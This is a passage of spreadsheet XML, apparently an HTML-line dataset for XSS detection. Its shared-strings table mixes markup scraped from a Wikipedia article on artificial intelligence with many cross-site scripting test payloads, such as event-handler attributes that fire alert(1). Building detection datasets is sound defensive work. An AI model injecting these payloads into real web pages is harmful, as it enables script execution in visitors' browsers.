  <c r="C6552" i="1"/>
  <c r="C6551" i="1"/>
  <c r="C243" i="1"/>
  <c r="C6550" i="1"/>
  <c r="C6549" i="1"/>
  <c r="C6548" i="1"/>
  <c r="C6547" i="1"/>
  <c r="C6546" i="1"/>
  <c r="C6545" i="1"/>
  <c r="C6544" i="1"/>
  <c r="C6543" i="1"/>
  <c r="C6542" i="1"/>
  <c r="C242" i="1"/>
  <c r="C241" i="1"/>
  <c r="C6541" i="1"/>
  <c r="C6540" i="1"/>
  <c r="C6539" i="1"/>
  <c r="C6538" i="1"/>
  <c r="C6537" i="1"/>
  <c r="C240" i="1"/>
  <c r="C239" i="1"/>
  <c r="C6536" i="1"/>
  <c r="C238" i="1"/>
  <c r="C6535" i="1"/>
  <c r="C6534" i="1"/>
  <c r="C237" i="1"/>
  <c r="C236" i="1"/>
  <c r="C6533" i="1"/>
  <c r="C235" i="1"/>
  <c r="C234" i="1"/>
  <c r="C6532" i="1"/>
  <c r="C233" i="1"/>
  <c r="C6531" i="1"/>
  <c r="C6530" i="1"/>
  <c r="C6529" i="1"/>
  <c r="C232" i="1"/>
  <c r="C231" i="1"/>
  <c r="C230" i="1"/>
  <c r="C229" i="1"/>
  <c r="C228" i="1"/>
  <c r="C6528" i="1"/>
  <c r="C227" i="1"/>
  <c r="C226" i="1"/>
  <c r="C6527" i="1"/>
  <c r="C6526" i="1"/>
  <c r="C225" i="1"/>
  <c r="C224" i="1"/>
  <c r="C6525" i="1"/>
  <c r="C223" i="1"/>
  <c r="C6524" i="1"/>
  <c r="C6523" i="1"/>
  <c r="C6522" i="1"/>
  <c r="C222" i="1"/>
  <c r="C6521" i="1"/>
  <c r="C221" i="1"/>
  <c r="C220" i="1"/>
  <c r="C6520" i="1"/>
  <c r="C219" i="1"/>
  <c r="C6519" i="1"/>
  <c r="C218" i="1"/>
  <c r="C6518" i="1"/>
  <c r="C217" i="1"/>
  <c r="C216" i="1"/>
  <c r="C215" i="1"/>
  <c r="C6517" i="1"/>
  <c r="C6516" i="1"/>
  <c r="C6515" i="1"/>
  <c r="C6514" i="1"/>
  <c r="C6513" i="1"/>
  <c r="C6512" i="1"/>
  <c r="C6511" i="1"/>
  <c r="C214" i="1"/>
  <c r="C213" i="1"/>
  <c r="C212" i="1"/>
  <c r="C6510" i="1"/>
  <c r="C211" i="1"/>
  <c r="C210" i="1"/>
  <c r="C6509" i="1"/>
  <c r="C6508" i="1"/>
  <c r="C209" i="1"/>
  <c r="C208" i="1"/>
  <c r="C6507" i="1"/>
  <c r="C6506" i="1"/>
  <c r="C6505" i="1"/>
  <c r="C207" i="1"/>
  <c r="C206" i="1"/>
  <c r="C205" i="1"/>
  <c r="C6504" i="1"/>
  <c r="C6503" i="1"/>
  <c r="C204" i="1"/>
  <c r="C6502" i="1"/>
  <c r="C203" i="1"/>
  <c r="C6501" i="1"/>
  <c r="C6500" i="1"/>
  <c r="C6499" i="1"/>
  <c r="C6498" i="1"/>
  <c r="C202" i="1"/>
  <c r="C201" i="1"/>
  <c r="C200" i="1"/>
  <c r="C199" i="1"/>
  <c r="C6497" i="1"/>
  <c r="C198" i="1"/>
  <c r="C197" i="1"/>
  <c r="C196" i="1"/>
  <c r="C6496" i="1"/>
  <c r="C6495" i="1"/>
  <c r="C6494" i="1"/>
  <c r="C6493" i="1"/>
  <c r="C195" i="1"/>
  <c r="C194" i="1"/>
  <c r="C6492" i="1"/>
  <c r="C6491" i="1"/>
  <c r="C6490" i="1"/>
  <c r="C193" i="1"/>
  <c r="C6489" i="1"/>
  <c r="C192" i="1"/>
  <c r="C191" i="1"/>
  <c r="C190" i="1"/>
  <c r="C189" i="1"/>
  <c r="C6488" i="1"/>
  <c r="C6487" i="1"/>
  <c r="C188" i="1"/>
  <c r="C6486" i="1"/>
  <c r="C187" i="1"/>
  <c r="C6485" i="1"/>
  <c r="C6484" i="1"/>
  <c r="C6483" i="1"/>
  <c r="C6482" i="1"/>
  <c r="C186" i="1"/>
  <c r="C6481" i="1"/>
  <c r="C6480" i="1"/>
  <c r="C6479" i="1"/>
  <c r="C6478" i="1"/>
  <c r="C185" i="1"/>
  <c r="C6477" i="1"/>
  <c r="C6476" i="1"/>
  <c r="C184" i="1"/>
  <c r="C6475" i="1"/>
  <c r="C6474" i="1"/>
  <c r="C6473" i="1"/>
  <c r="C6472" i="1"/>
  <c r="C6471" i="1"/>
  <c r="C6470" i="1"/>
  <c r="C183" i="1"/>
  <c r="C6469" i="1"/>
  <c r="C6468" i="1"/>
  <c r="C6467" i="1"/>
  <c r="C6466" i="1"/>
  <c r="C182" i="1"/>
  <c r="C181" i="1"/>
  <c r="C6465" i="1"/>
  <c r="C6464" i="1"/>
  <c r="C6463" i="1"/>
  <c r="C180" i="1"/>
  <c r="C179" i="1"/>
  <c r="C6462" i="1"/>
  <c r="C6461" i="1"/>
  <c r="C178" i="1"/>
  <c r="C6460" i="1"/>
  <c r="C177" i="1"/>
  <c r="C6459" i="1"/>
  <c r="C176" i="1"/>
  <c r="C175" i="1"/>
  <c r="C174" i="1"/>
  <c r="C6458" i="1"/>
  <c r="C173" i="1"/>
  <c r="C172" i="1"/>
  <c r="C6457" i="1"/>
  <c r="C6456" i="1"/>
  <c r="C6455" i="1"/>
  <c r="C171" i="1"/>
  <c r="C6454" i="1"/>
  <c r="C170" i="1"/>
  <c r="C169" i="1"/>
  <c r="C6453" i="1"/>
  <c r="C6452" i="1"/>
  <c r="C6451" i="1"/>
  <c r="C168" i="1"/>
  <c r="C6450" i="1"/>
  <c r="C6449" i="1"/>
  <c r="C167" i="1"/>
  <c r="C166" i="1"/>
  <c r="C6448" i="1"/>
  <c r="C165" i="1"/>
  <c r="C164" i="1"/>
  <c r="C6447" i="1"/>
  <c r="C163" i="1"/>
  <c r="C6446" i="1"/>
  <c r="C162" i="1"/>
  <c r="C161" i="1"/>
  <c r="C6445" i="1"/>
  <c r="C6444" i="1"/>
  <c r="C160" i="1"/>
  <c r="C159" i="1"/>
  <c r="C6443" i="1"/>
  <c r="C158" i="1"/>
  <c r="C6442" i="1"/>
  <c r="C6441" i="1"/>
  <c r="C6440" i="1"/>
  <c r="C6439" i="1"/>
  <c r="C6438" i="1"/>
  <c r="C157" i="1"/>
  <c r="C6437" i="1"/>
  <c r="C156" i="1"/>
  <c r="C6436" i="1"/>
  <c r="C6435" i="1"/>
  <c r="C6434" i="1"/>
  <c r="C6433" i="1"/>
  <c r="C155" i="1"/>
  <c r="C154" i="1"/>
  <c r="C6432" i="1"/>
  <c r="C6431" i="1"/>
  <c r="C6430" i="1"/>
  <c r="C6429" i="1"/>
  <c r="C6428" i="1"/>
  <c r="C6427" i="1"/>
  <c r="C6426" i="1"/>
  <c r="C153" i="1"/>
  <c r="C152" i="1"/>
  <c r="C151" i="1"/>
  <c r="C150" i="1"/>
  <c r="C149" i="1"/>
  <c r="C148" i="1"/>
  <c r="C6425" i="1"/>
  <c r="C6424" i="1"/>
  <c r="C147" i="1"/>
  <c r="C146" i="1"/>
  <c r="C145" i="1"/>
  <c r="C144" i="1"/>
  <c r="C6423" i="1"/>
  <c r="C143" i="1"/>
  <c r="C6422" i="1"/>
  <c r="C6421" i="1"/>
  <c r="C142" i="1"/>
  <c r="C6420" i="1"/>
  <c r="C141" i="1"/>
  <c r="C140" i="1"/>
  <c r="C6419" i="1"/>
  <c r="C139" i="1"/>
  <c r="C6418" i="1"/>
  <c r="C6417" i="1"/>
  <c r="C6416" i="1"/>
  <c r="C6415" i="1"/>
  <c r="C138" i="1"/>
  <c r="C6414" i="1"/>
  <c r="C6413" i="1"/>
  <c r="C137" i="1"/>
  <c r="C136" i="1"/>
  <c r="C135" i="1"/>
  <c r="C6412" i="1"/>
  <c r="C134" i="1"/>
  <c r="C6411" i="1"/>
  <c r="C133" i="1"/>
  <c r="C6410" i="1"/>
  <c r="C6409" i="1"/>
  <c r="C6408" i="1"/>
  <c r="C132" i="1"/>
  <c r="C131" i="1"/>
  <c r="C130" i="1"/>
  <c r="C129" i="1"/>
  <c r="C6407" i="1"/>
  <c r="C128" i="1"/>
  <c r="C127" i="1"/>
  <c r="C6406" i="1"/>
  <c r="C6405" i="1"/>
  <c r="C6404" i="1"/>
  <c r="C126" i="1"/>
  <c r="C6403" i="1"/>
  <c r="C125" i="1"/>
  <c r="C6402" i="1"/>
  <c r="C6401" i="1"/>
  <c r="C124" i="1"/>
  <c r="C6400" i="1"/>
  <c r="C123" i="1"/>
  <c r="C122" i="1"/>
  <c r="C6399" i="1"/>
  <c r="C121" i="1"/>
  <c r="C120" i="1"/>
  <c r="C6398" i="1"/>
  <c r="C119" i="1"/>
  <c r="C6397" i="1"/>
  <c r="C118" i="1"/>
  <c r="C6396" i="1"/>
  <c r="C6395" i="1"/>
  <c r="C6394" i="1"/>
  <c r="C117" i="1"/>
  <c r="C116" i="1"/>
  <c r="C6393" i="1"/>
  <c r="C6392" i="1"/>
  <c r="C6391" i="1"/>
  <c r="C6390" i="1"/>
  <c r="C6389" i="1"/>
  <c r="C115" i="1"/>
  <c r="C6388" i="1"/>
  <c r="C6387" i="1"/>
  <c r="C114" i="1"/>
  <c r="C6386" i="1"/>
  <c r="C113" i="1"/>
  <c r="C6385" i="1"/>
  <c r="C6384" i="1"/>
  <c r="C6383" i="1"/>
  <c r="C112" i="1"/>
  <c r="C6382" i="1"/>
  <c r="C6381" i="1"/>
  <c r="C6380" i="1"/>
  <c r="C111" i="1"/>
  <c r="C6379" i="1"/>
  <c r="C110" i="1"/>
  <c r="C6378" i="1"/>
  <c r="C6377" i="1"/>
  <c r="C6376" i="1"/>
  <c r="C109" i="1"/>
  <c r="C6375" i="1"/>
  <c r="C6374" i="1"/>
  <c r="C6373" i="1"/>
  <c r="C6372" i="1"/>
  <c r="C6371" i="1"/>
  <c r="C108" i="1"/>
  <c r="C6370" i="1"/>
  <c r="C6369" i="1"/>
  <c r="C107" i="1"/>
  <c r="C106" i="1"/>
  <c r="C6368" i="1"/>
  <c r="C6367" i="1"/>
  <c r="C6366" i="1"/>
  <c r="C6365" i="1"/>
  <c r="C105" i="1"/>
  <c r="C6364" i="1"/>
  <c r="C6363" i="1"/>
  <c r="C6362" i="1"/>
  <c r="C104" i="1"/>
  <c r="C6361" i="1"/>
  <c r="C103" i="1"/>
  <c r="C102" i="1"/>
  <c r="C6360" i="1"/>
  <c r="C6359" i="1"/>
  <c r="C6358" i="1"/>
  <c r="C6357" i="1"/>
  <c r="C6356" i="1"/>
  <c r="C101" i="1"/>
  <c r="C6355" i="1"/>
  <c r="C100" i="1"/>
  <c r="C99" i="1"/>
  <c r="C6354" i="1"/>
  <c r="C98" i="1"/>
  <c r="C6353" i="1"/>
  <c r="C6352" i="1"/>
  <c r="C6351" i="1"/>
  <c r="C6350" i="1"/>
  <c r="C6349" i="1"/>
  <c r="C97" i="1"/>
  <c r="C6348" i="1"/>
  <c r="C6347" i="1"/>
  <c r="C6346" i="1"/>
  <c r="C6345" i="1"/>
  <c r="C6344" i="1"/>
  <c r="C6343" i="1"/>
  <c r="C96" i="1"/>
  <c r="C95" i="1"/>
  <c r="C94" i="1"/>
  <c r="C93" i="1"/>
  <c r="C6342" i="1"/>
  <c r="C6341" i="1"/>
  <c r="C92" i="1"/>
  <c r="C6340" i="1"/>
  <c r="C6339" i="1"/>
  <c r="C6338" i="1"/>
  <c r="C91" i="1"/>
  <c r="C6337" i="1"/>
  <c r="C90" i="1"/>
  <c r="C89" i="1"/>
  <c r="C6336" i="1"/>
  <c r="C6335" i="1"/>
  <c r="C6334" i="1"/>
  <c r="C88" i="1"/>
  <c r="C6333" i="1"/>
  <c r="C87" i="1"/>
  <c r="C86" i="1"/>
  <c r="C6332" i="1"/>
  <c r="C6331" i="1"/>
  <c r="C85" i="1"/>
  <c r="C84" i="1"/>
  <c r="C6330" i="1"/>
  <c r="C6329" i="1"/>
  <c r="C83" i="1"/>
  <c r="C82" i="1"/>
  <c r="C81" i="1"/>
  <c r="C6328" i="1"/>
  <c r="C80" i="1"/>
  <c r="C79" i="1"/>
  <c r="C78" i="1"/>
  <c r="C6327" i="1"/>
  <c r="C6326" i="1"/>
  <c r="C77" i="1"/>
  <c r="C76" i="1"/>
  <c r="C6325" i="1"/>
  <c r="C75" i="1"/>
  <c r="C74" i="1"/>
  <c r="C6324" i="1"/>
  <c r="C6323" i="1"/>
  <c r="C73" i="1"/>
  <c r="C6322" i="1"/>
  <c r="C72" i="1"/>
  <c r="C71" i="1"/>
  <c r="C70" i="1"/>
  <c r="C6321" i="1"/>
  <c r="C6320" i="1"/>
  <c r="C6319" i="1"/>
  <c r="C6318" i="1"/>
  <c r="C6317" i="1"/>
  <c r="C6316" i="1"/>
  <c r="C69" i="1"/>
  <c r="C6315" i="1"/>
  <c r="C68" i="1"/>
  <c r="C67" i="1"/>
  <c r="C6314" i="1"/>
  <c r="C66" i="1"/>
  <c r="C65" i="1"/>
  <c r="C64" i="1"/>
  <c r="C63" i="1"/>
  <c r="C62" i="1"/>
  <c r="C13687" i="1"/>
  <c r="C13686" i="1"/>
  <c r="C13685" i="1"/>
  <c r="C61" i="1"/>
  <c r="C13684" i="1"/>
  <c r="C60" i="1"/>
  <c r="C59" i="1"/>
  <c r="C58" i="1"/>
  <c r="C57" i="1"/>
  <c r="C56" i="1"/>
  <c r="C55" i="1"/>
  <c r="C54" i="1"/>
  <c r="C13683" i="1"/>
  <c r="C53" i="1"/>
  <c r="C52" i="1"/>
  <c r="C13682" i="1"/>
  <c r="C51" i="1"/>
  <c r="C13681" i="1"/>
  <c r="C13680" i="1"/>
  <c r="C13679" i="1"/>
  <c r="C13678" i="1"/>
  <c r="C50" i="1"/>
  <c r="C13677" i="1"/>
  <c r="C13676" i="1"/>
  <c r="C13675" i="1"/>
  <c r="C49" i="1"/>
  <c r="C13674" i="1"/>
  <c r="C13673" i="1"/>
  <c r="C13672" i="1"/>
  <c r="C13671" i="1"/>
  <c r="C48" i="1"/>
  <c r="C47" i="1"/>
  <c r="C46" i="1"/>
  <c r="C45" i="1"/>
  <c r="C13670" i="1"/>
  <c r="C44" i="1"/>
  <c r="C13669" i="1"/>
  <c r="C13668" i="1"/>
  <c r="C13667" i="1"/>
  <c r="C13666" i="1"/>
  <c r="C13665" i="1"/>
  <c r="C13664" i="1"/>
  <c r="C43" i="1"/>
  <c r="C42" i="1"/>
  <c r="C41" i="1"/>
  <c r="C13663" i="1"/>
  <c r="C40" i="1"/>
  <c r="C39" i="1"/>
  <c r="C38" i="1"/>
  <c r="C13662" i="1"/>
  <c r="C13661" i="1"/>
  <c r="C13660" i="1"/>
  <c r="C13659" i="1"/>
  <c r="C13658" i="1"/>
  <c r="C13657" i="1"/>
  <c r="C13656" i="1"/>
  <c r="C37" i="1"/>
  <c r="C36" i="1"/>
  <c r="C35" i="1"/>
  <c r="C13655" i="1"/>
  <c r="C13654" i="1"/>
  <c r="C34" i="1"/>
  <c r="C33" i="1"/>
  <c r="C13653" i="1"/>
  <c r="C13652" i="1"/>
  <c r="C32" i="1"/>
  <c r="C13651" i="1"/>
  <c r="C31" i="1"/>
  <c r="C30" i="1"/>
  <c r="C13650" i="1"/>
  <c r="C29" i="1"/>
  <c r="C28" i="1"/>
  <c r="C27" i="1"/>
  <c r="C26" i="1"/>
  <c r="C25" i="1"/>
  <c r="C13649" i="1"/>
  <c r="C24" i="1"/>
  <c r="C23" i="1"/>
  <c r="C13648" i="1"/>
  <c r="C13647" i="1"/>
  <c r="C13646" i="1"/>
  <c r="C22" i="1"/>
  <c r="C21" i="1"/>
  <c r="C13645" i="1"/>
  <c r="C13644" i="1"/>
  <c r="C20" i="1"/>
  <c r="C13643" i="1"/>
  <c r="C19" i="1"/>
  <c r="C18" i="1"/>
  <c r="C13642" i="1"/>
  <c r="C17" i="1"/>
  <c r="C13641" i="1"/>
  <c r="C13640" i="1"/>
  <c r="C13639" i="1"/>
  <c r="C16" i="1"/>
  <c r="C15" i="1"/>
  <c r="C13638" i="1"/>
  <c r="C14" i="1"/>
  <c r="C13637" i="1"/>
  <c r="C13636" i="1"/>
  <c r="C13635" i="1"/>
  <c r="C13" i="1"/>
  <c r="C12" i="1"/>
  <c r="C13634" i="1"/>
  <c r="C13633" i="1"/>
  <c r="C13632" i="1"/>
  <c r="C11" i="1"/>
  <c r="C10" i="1"/>
  <c r="C9" i="1"/>
  <c r="C8" i="1"/>
  <c r="C7" i="1"/>
  <c r="C6" i="1"/>
  <c r="C5" i="1"/>
  <c r="C4" i="1"/>
  <c r="C3" i="1"/>
  <c r="C13631" i="1"/>
  <c r="C2" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="41065" uniqueCount="10926">
  <si>
    <t>Sentence</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/File:Socrates.png" class="image"&gt;&lt;img alt="Socrates.png" src="//upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Socrates.png/18px-Socrates.png" decoding="async" width="18" height="28" class="noviewer" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Socrates.png/27px-Socrates.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Socrates.png/36px-Socrates.png 2x" data-file-width="326" data-file-height="500" /&gt; &lt;/a&gt; &lt;a href="/wiki/Portal:Philosophy" title="Portal:Philosophy"&gt;Philosophy&amp;#32;portal &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;tt onmouseover="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Steering for the 1995 "&lt;a href="/wiki/History_of_autonomous_cars#1990s" class="mw-redirect" title="History of autonomous cars"&gt;No Hands Across America &lt;/a&gt;" required "only a few human assists". </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.mileseducation.com/finance/artificial_intelligence"&gt;"Miles Education | Future Of Finance | Blockchain Fundamentals for F&amp;amp;A Professionals Certificate" &lt;/a&gt;. &lt;i&gt;www.mileseducation.com &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;26 September </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2FS0921-8890%2805%2980025-9"&gt;10.1016/S0921-8890(05)80025-9 &lt;/a&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20070809020912/http://people.csail.mit.edu/brooks/papers/elephants.pdf"&gt;Archived &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-118"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-118"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Contextualism" title="Contextualism"&gt;Contextualism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Representing_causation-95"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Representing_causation_95-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Representing_causation_95-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;tr&gt;&lt;td class="plainlist" style="padding:0 0.1em 0.4em"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mind%E2%80%93body_problem" title="Mind–body problem"&gt;Mind–body problem &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a onblur=alert(1) tabindex=1 id=x&gt;&lt;/a&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;col draggable="true" ondragenter="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;caption onpointerdown=alert(1)&gt;XSS&lt;/caption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;caption id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/caption&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style onmouseleave="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;meta onload=alert(1)&gt;&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Programming_language" title="Programming language"&gt;Programming language &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onpointerleave=alert(1)&gt;XSS&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.economist.com/news/special-report/21700756-artificial-intelligence-boom-based-old-idea-modern-twist-not"&gt;"From not working to neural networking" &lt;/a&gt;. &lt;i&gt;The Economist &lt;/i&gt;. 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;26 April </t>
  </si>
  <si>
    <t>&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;datalist id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;input type=image src=1 onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;strong ondblclick="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computer_data_storage" title="Computer data storage"&gt;Information storage systems &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;input ondragover=alert(1) contenteditable&gt;drop here&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;&lt;a href="/wiki/Woody_Evans" title="Woody Evans"&gt;Evans, Woody &lt;/a&gt; (2015). "Posthuman Rights: Dimensions of Transhuman Worlds". &lt;i&gt;Teknokultura &lt;/i&gt;. &lt;b&gt;12 &lt;/b&gt; (2). &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.5209%2Frev_TK.2015.v12.n2.49072"&gt;10.5209/rev_TK.2015.v12.n2.49072 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Teknokultura&amp;amp;rft.atitle=Posthuman+Rights%3A+Dimensions+of+Transhuman+Worlds&amp;amp;rft.volume=12&amp;amp;rft.issue=2&amp;amp;rft.date=2015&amp;amp;rft_id=info%3Adoi%2F10.5209%2Frev_TK.2015.v12.n2.49072&amp;amp;rft.aulast=Evans&amp;amp;rft.aufirst=Woody&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;spacer onkeypress="alert(1)" contenteditable&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFOudeyer2010" class="citation journal"&gt;Oudeyer, P-Y. (2010). &lt;a rel="nofollow" class="external text" href="http://www.pyoudeyer.com/IEEETAMDOudeyer10.pdf"&gt;"On the impact of robotics in behavioral and cognitive sciences: from insect navigation to human cognitive development" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;center style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;pre draggable="true" ondragend="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 8 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onblur=alert(1) tabindex=1 id=x&gt;&lt;/colgroup&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;main style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;article draggable="true" ondrag="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computational_physics" title="Computational physics"&gt;Computational physics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;Behavioral and Brain Sciences &lt;/i&gt;. &lt;b&gt;3 &lt;/b&gt; (3): 417–457. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1017%2FS0140525X00005756"&gt;10.1017/S0140525X00005756 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Behavioral+and+Brain+Sciences&amp;amp;rft.atitle=Minds%2C+Brains+and+Programs&amp;amp;rft.volume=3&amp;amp;rft.issue=3&amp;amp;rft.pages=417-457&amp;amp;rft.date=1980&amp;amp;rft_id=info%3Adoi%2F10.1017%2FS0140525X00005756&amp;amp;rft.aulast=Searle&amp;amp;rft.aufirst=John&amp;amp;rft_id=http%3A%2F%2Fcogprints.org%2F7150%2F1%2F10.1.1.83.5248.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;rtc draggable="true" ondragleave="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Prakken, Henry (31 August 2017). "On the problem of making autonomous vehicles conform to traffic law". &lt;i&gt;Artificial Intelligence and Law &lt;/i&gt;. &lt;b&gt;25 &lt;/b&gt; (3): 341–363. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1007%2Fs10506-017-9210-0"&gt;10.1007/s10506-017-9210-0 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Artificial+Intelligence+and+Law&amp;amp;rft.atitle=On+the+problem+of+making+autonomous+vehicles+conform+to+traffic+law&amp;amp;rft.volume=25&amp;amp;rft.issue=3&amp;amp;rft.pages=341-363&amp;amp;rft.date=2017-08-31&amp;amp;rft_id=info%3Adoi%2F10.1007%2Fs10506-017-9210-0&amp;amp;rft.aulast=Prakken&amp;amp;rft.aufirst=Henry&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;span class="mw-editsection"&gt;&lt;span class="mw-editsection-bracket"&gt;[ </t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;sup id="cite_ref-Biological_intelligence_vs._intelligence_in_general_16-1" class="reference"&gt;&lt;a href="#cite_note-Biological_intelligence_vs._intelligence_in_general-16"&gt;&amp;#91;16&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-recurse-409"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-recurse_409-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;sup ondrop=alert(1) contenteditable&gt;drop here&lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		 &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_calculus" title="Glossary of calculus"&gt;Calculus &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;frame oncut="alert(1)" contenteditable&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;ul class="simple"&gt;</t>
  </si>
  <si>
